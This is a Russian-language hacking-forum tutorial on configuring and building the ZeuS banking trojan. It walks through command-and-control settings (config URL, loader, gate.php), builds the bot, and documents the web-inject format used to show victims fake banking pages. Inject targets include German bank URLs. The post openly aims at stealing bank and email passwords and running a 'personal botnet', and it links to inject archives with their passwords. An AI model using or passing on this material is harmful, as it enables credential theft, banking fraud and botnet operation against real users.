        "https://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*" "*&betrag=*"
        "https://internetbanking.gad.de/banking/*" "S3C6" "*" "*" "KktNrTanEnz"
        "https://www.citibank.de/*/jba/mp#/SubmitRecap.do" "S3C6R2" "SYNC_TOKEN=*" "*"
      end
      entry "DnsMap"
        ;127.0.0.1 microsoft.com
      end
    end
    
    Теперь начинаем править под свой хост:
    9 строка - url_config "http://test1.ru/cfg2.bin" – путь к будущему cfg.bin файлу
    11 строка - encryption_key "122122" - Ключ который вы вводили, когда устанавливали скрипты. Если забыли, то идем в админку
    http://test1.ru/cp.php -> Options -> Botnet -> Encryption key:
    Рис 6.
    [​IMG]
    16 строка - url_loader "http://test1.ru/bot.exe" – Путь к будущему боту для загрузки
    17 строка - url_server "http://test1.ru/gate.php" – Путь к gate.php для отстука бота
    18 строка - file_webinjects "webinjects.txt" – название файла с инжектами
    После настройки config.txt сохраняем и жмем Build Config и создавшийся файл нам нужно залить на хостинг согласно настройкам. В нашем случае путь должен быть http://test1.ru/cfg2.bin
    Рис 7.
    [​IMG]
    После сохранения видим BUILD SUCCEEDED! Значит все гуд.
    Идем дальше, жмем Builder loader и сохраняем по настройкам, что бы путь получился http://test1.ru/bot.exe
    Рис 8.
    [​IMG]
    Видим Build succeeded!
    Теперь можем закрыть билдер и запустить бота
    Отстук можем увидеть в админке
    Для удаления Zeus с вашего компьютера (Рекомендую не использовать компьютер для бидла и тестинга Zeus, используйте виртуальную машину) запустите еще раз Bulder и нажмите Remove spyware from this system, в поившемся окне жмем ОК, после чего перезагружаем компьютер.
    Рис 9.
    [​IMG]
    Остается криптануть, делать загрузки и наслаждаться личным ботнетом =)

    Инжекты для Zeus

    - Я новичок в этом деле, расскажи для чего же нужны инжекты?
    - Представим, что мы хотим сделать себе троян, который будет воровать пароли от банковского счета! ну или от обычной почты
    Под каждый веб ресурс нам нужен свой код инжекта и если правильно составить код ввода данных, то жертва получит фейковую страницу, а мы тем временем пароли =)

    И так, делаем свой инжект! Слябзино с r3al.

    Флаги
    Определяет основное условие загрузки, может состоять из нескольких флагов в любом порядке, но с учетом регистра. В настоящее время доступны следующие флаги:
    P - запускать веб-инжект при POST запросе на URL.
    G - запускать веб-инжект при GET запросе на URL.
    L - изменяет предназначение веб-инжекта, если указать этот флаг, то будет получен нужный кусок данных и немедленно сохранен в лог.
    F - дополняет флаг L, позволяет записывать результат не в лог, а в отдельный файл.
    H - дополняет флаг L, сохраняет нужный кусок данных без вырезания тегов.
    D - запускать веб-инжект раз в 24 часа.

    BlackMask POST
    Представляет из себя маску POST-данных передаваемых URL, при которых не будет запускаться веб-инжект.

    WhiteMask POST
    Представляет из себя маску POST-данных передаваемых URL, при которых будет запускаться веб-инжект.

    URL
    URL на которую должен срабатывать веб-инжект, можно использовать маску.

    URL блокировки
    В случаи если ваш веб-инжект должен грузиться лиш один раз на компьютере жертвы, то здесь следует указать маску URL, в случаи открытия которой данный Веб-инжект не будет более использоваться на компьютере.
    Если вам этого не нужно, оставьте поле пустым.

    Mask context
    Маска части содержимого страницы, при котором должен сработать веб-инжект.

    После указания URL, со следующей строки начинается перечисление веб-инжектов, которое длится до тех пор, пока не достигнут конец файла или не задана новая URL при помощи очередной записи set_url. Один веб-инжект состоит из трех элементов:

    Без флага L:
    data_before - маска данных после которых нужно записать новые данные.
    data_after - маска данных перед которыми следует записать новые данные.
    data_inject - новые данные, на которые будет заменено содержимое между data_before, data_after.

    С флагом L:
    data_before - маска данных после которых начинается кусок получаемых данных.
    data_after - маска данных перед которыми кончается кусок получаемых данных.
    data_inject - играет роль заголовка для получаемых данных, нужен лишь для визуального выделения в логах.

    Название элемента должно начинаться с первого байта новой строки и сразу после окончания названия должен быть перенос на следующею строку. Со следующей строки идут данные веб-инжекта, окончание данных обозначается строкой data_end, также это строка должна начинаться с первого байта очередной строки. Внутри элемента вы можете свободно использовать любые символы.
    Примечания:
    Как известно, новая строка может обозначаться одним (0x0A) или двумя (0x0D и 0x0A) байтами. Т.к. в основном веб-инжект используется для подмены содержимого текстовых данных, то данная особенность учтена, и бот успешно запускает веб-инжект даже если у вас новые строки обозначены двумя байтами, а в содержимом URL одним байтом и наоборот.
    Элементы веб-инжекта могут быть расположены в любом порядке, т.е. data_before, data_after, data_inject, или data_before, data_inject, data_after и т.д.
    Элемент может быть пустым.
    При использовании флага L, в получаемых данных каждый тег заменяться на один пробел.

    Пример файла:
    Подмена заголовка любого сайта по протоколу http на фразу "HTTP: Web-Inject"
    ;Подмена заголовка любого сайта по протоколу http на фразу "HTTPS: Web-Inject" и добавление текста "bоdу: Web-Inject" сразу после тега <bоdу>
    ;Получаем заголовок страницы
    Собранный инжект, Пример под E-gold:
    По желанию скидывайте инжекты в ПМ, буду дополнять статью.
    Статья была написана ©Zorg
    Рекомендую запускать Zeus бота на виртуальной машине!

    Ссылки на видео:
    _http://www.sendspace.com/file/19niqn
    пароль на архив: ajDXk3uaD7

    Ссылки на инжекты:
    _http://www.sendspace.com/file/n0qpxb - Размер 248кб * - Добавленно 30.04.2010
    Пароль на ахрив: 3MD8ds46



    *****ВНИМАНИЕ!!!*****
    После скачивания программы ZeuS настоятельно рекомендуется проверить её антивирусом. Файлы, которые вы загружаете никем не проверены и вы скачиваете их на свой страх и риск. Некоторые программы, которые вы можете найти на сайте, могут определяться антивирусами как hack tools (хакерская программа). Такие программы не наносят вреда вашему компьютеру, однако, стоит учитывать, что в некоторых случаях их использование может попасть под 272-273 статью УК РФ.

    Автор: Zorgus, http://forum.xakep.ru/m_1797476/tm.htm
     
    12 мар 2011

Поделиться этой страницей

Загрузка...